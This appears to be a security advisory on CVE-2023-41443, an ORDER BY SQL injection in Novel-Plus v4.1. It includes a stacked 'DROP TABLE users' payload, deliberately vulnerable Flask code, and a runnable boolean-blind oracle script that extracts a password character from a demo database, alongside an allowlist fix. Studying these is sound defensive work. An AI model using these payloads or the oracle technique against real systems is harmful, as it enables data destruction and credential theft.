Security researchers have reported a critical SQL injection vulnerability in Novel-Plus v.4.1: a crafted value sent in the sort parameter of /sys/menu/list is placed into an SQL query unchecked. The vulnerability has been assigned the CVE identifier CVE-2023-41443. The CVE description states that a remote attacker can use it to execute arbitrary code; the immediate consequence is control of the query's ORDER BY clause, which gives the attacker access to the database under the application's account, and whether that escalates to code execution on the host depends on the privileges of that database account and on the database server's configuration.

Vulnerable Software: Novel-Plus v.4.1

Affected Component: /sys/menu/list

Impact: SQL injection; arbitrary code execution per the CVE description

The vulnerability is in the handling of the sort parameter of /sys/menu/list: the value is appended to the query's ORDER BY clause without validation, so an attacker can inject arbitrary SQL, read or modify data the application's database account can reach, and potentially go further depending on database privileges. The snippet below is a simplified Python/Flask illustration of the vulnerable pattern, not Novel-Plus's own source (Novel-Plus is a Java Spring Boot application); it shows the same mistake in a few lines:

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/sys/menu/list")
def menu_list():
    # The sort value is taken straight from the query string...
    sort = request.args.get('sort', 'asc')
    # ...and concatenated into the ORDER BY clause; get_db() is the app's connection helper
    cursor = get_db().execute("SELECT * FROM menus ORDER BY order_num " + sort, [])
    menus = cursor.fetchall()
    cursor.close()
    return jsonify(menus)

As seen above, the code does not validate the 'sort' parameter. Because the value lands after ORDER BY order_num, the attacker controls an SQL expression rather than just the keyword asc or desc, and the ordering of the rows returned by the endpoint becomes a channel for learning the result of any expression the database will evaluate.

In general, an attacker exploits the flaw with a request of the form

http://[target]/sys/menu/list?sort=asc;[malicious SQL query]

For example, the sort parameter could carry a second statement:

http://[target]/sys/menu/list?sort=asc; DROP TABLE users;

If the database driver executes stacked statements, this drops the 'users' table. That is not always the case: MySQL's JDBC driver only allows multiple statements per call when allowMultiQueries=true is set, and Python's sqlite3 module refuses them outright. Where stacked queries are unavailable the injection is still exploitable, because the attacker controls the ORDER BY expression itself: a CASE on a subquery makes the returned ordering reveal one bit per request (boolean-based blind injection), a deliberately slow expression turns response time into the oracle (time-based), and either technique extracts data from any table the application's database account can read.

Mitigation

The direct fix is to allowlist the "sort" parameter so that only the literal values "asc" and "desc" reach the query, with anything else replaced by a safe default. A simple implementation looks like this:

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/sys/menu/list")
def menu_list():
    sort = request.args.get('sort', 'asc')
    # Only the two literal directions are allowed; anything else falls back to the default
    if sort not in ['asc', 'desc']:
        sort = 'asc'
    # get_db() is the app's connection helper; the concatenated value is now one of two known constants
    cursor = get_db().execute("SELECT * FROM menus ORDER BY order_num " + sort, [])
    menus = cursor.fetchall()
    cursor.close()
    return jsonify(menus)

The general remedy for SQL injection is parameterized queries, with a placeholder for every user-supplied data value. Placeholders bind values, though, not SQL syntax: a column name or the ASC/DESC keyword cannot be passed as a bound parameter, so for a sort parameter the strict allowlist above is the correct permanent fix, and parameterization applies to the other user-controlled inputs the same query may take (filters, pagination values, search terms).
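The exploitation section and the allowlist mitigation above, carried through as an added runnable example. This is not Novel-Plus code: the in-memory SQLite database, its menus and users tables and the admin row are constructed for the demonstration, and the Java/MySQL stack Novel-Plus actually uses differs in details such as stacked-query support. It shows the vulnerable and the allowlisted query side by side, uses the row ordering of the vulnerable endpoint as a boolean oracle to recover a character from another table, confirms the allowlisted endpoint leaks nothing, and tries the page's stacked DROP TABLE payload to show that this driver refuses it.

```python
import sqlite3

# Added example, not Novel-Plus code: an in-memory SQLite stand-in for the
# application's database, with constructed sample rows. The hypothetical
# users table is what the attacker wants to read through the menu endpoint.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE menus (menu_id INTEGER, name TEXT, order_num INTEGER);
        INSERT INTO menus VALUES (1, 'Books', 1), (2, 'Authors', 2), (3, 'Settings', 3);
        CREATE TABLE users (user_id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return db

ALLOWED_SORT = {"asc", "desc"}

def menu_list_vulnerable(db, sort):
    """The page's pattern: the sort value is concatenated into ORDER BY unchecked."""
    cur = db.execute("SELECT menu_id, name FROM menus ORDER BY order_num " + sort)
    return [name for _, name in cur.fetchall()]

def menu_list_fixed(db, sort):
    """Allowlisted version: only the two literal directions reach the query."""
    if sort not in ALLOWED_SORT:
        sort = "asc"
    cur = db.execute("SELECT menu_id, name FROM menus ORDER BY order_num " + sort)
    return [name for _, name in cur.fetchall()]

def oracle_payload(condition):
    """Boolean-blind probe for the ORDER BY position.

    The endpoint only ever returns menu rows, but the injected expression
    multiplies the sort key by -1 when `condition` holds, so the order of the
    menu names leaks one bit per request.
    """
    return f"* (CASE WHEN ({condition}) THEN -1 ELSE 1 END)"

def leak_first_char(db, endpoint):
    """Recover the first character of the admin password through `endpoint`.

    Returns None when the endpoint does not act as an oracle, i.e. the fix holds.
    """
    baseline = endpoint(db, "asc")
    for ch in "abcdefghijklmnopqrstuvwxyz0123456789":
        condition = ("(SELECT substr(password, 1, 1) FROM users "
                     f"WHERE username = 'admin') = '{ch}'")
        if endpoint(db, oracle_payload(condition)) != baseline:
            return ch
    return None

def stacked_query_rejected(db):
    """Try the page's 'asc; DROP TABLE users;' payload.

    Python's sqlite3 refuses to run more than one statement per execute() call
    (older versions raise sqlite3.Warning, newer ones ProgrammingError), so the
    stacked form fails here even against the vulnerable endpoint.
    """
    try:
        menu_list_vulnerable(db, "asc; DROP TABLE users;")
    except (sqlite3.Warning, sqlite3.Error):
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint leaks first password char:", leak_first_char(db, menu_list_vulnerable))
    print("fixed endpoint leaks:", leak_first_char(db, menu_list_fixed))
    print("stacked query rejected by sqlite3:", stacked_query_rejected(db))
```

The oracle needs no error messages and no extra columns in the response: the attacker compares the order of the three menu names against a baseline request, which is exactly what a real /sys/menu/list response exposes. Against a MySQL backend the same probe works with MySQL's CASE syntax, and a SLEEP()-based variant turns response time into the oracle where the ordering is not observable.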

References

1. National Vulnerability Database (NVD) - CVE-2023-41443
2. Exploit Database Entry - CVE-2023-41443

Conclusion

SQL injection remains a critical vulnerability class with severe consequences for affected systems, from unauthorized data access and modification to, depending on database privileges, arbitrary code execution. To avoid it, developers should validate input against a strict allowlist wherever it selects SQL syntax (sort columns and directions, table names) and use parameterized queries for every data value. Users of Novel-Plus v.4.1 are encouraged to apply the allowlist mitigation described above and to watch for an official release that addresses this issue.

Timeline

Published on: 09/18/2023 22:15:47 UTC
Last modified on: 09/20/2023 20:31:29 UTC